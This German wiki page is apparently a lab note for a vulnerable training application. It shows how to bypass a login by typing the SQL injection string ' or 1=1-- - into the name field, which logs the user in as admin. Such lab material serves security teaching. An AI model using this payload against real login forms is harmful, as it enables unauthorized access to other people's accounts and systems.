SQL Injection - Umgehen der Anmeldung
Aus xinux.net
Version vom 15. Juni 2021, 07:33 Uhr von
Tina.messmann
(
Diskussion
|
Beiträge
)
(
→Voraussetzung
)
(
Unterschied
)
← Nächstältere Version
|
Aktuelle Version
(
Unterschied
) |
Nächstjüngere Version →
(
Unterschied
)
Zur Navigation springen
Zur Suche springen
Voraussetzung
Security level: 0
Aufruf der Anmeldemaske
OWASP 2017 -> A1 Injection (SQL) -> SQLi Bypass Authentication -> Login
Eingabe im Namensfeld:
' or 1=1-- -
Nach Anklicken des Buttons Login ist man als Benutzer admin angemeldet.
Navigationsmenü
Meine Werkzeuge
Anmelden
Namensräume
Seite
Diskussion
Varianten
Ansichten
Lesen
Quelltext anzeigen
Versionsgeschichte
Mehr
Suche
Navigation
Hauptseite
Letzte Änderungen
Zufällige Seite
Hilfe zu MediaWiki
Werkzeuge
Links auf diese Seite
Änderungen an verlinkten Seiten
Spezialseiten
Druckversion
Permanenter Link
Seiteninformationen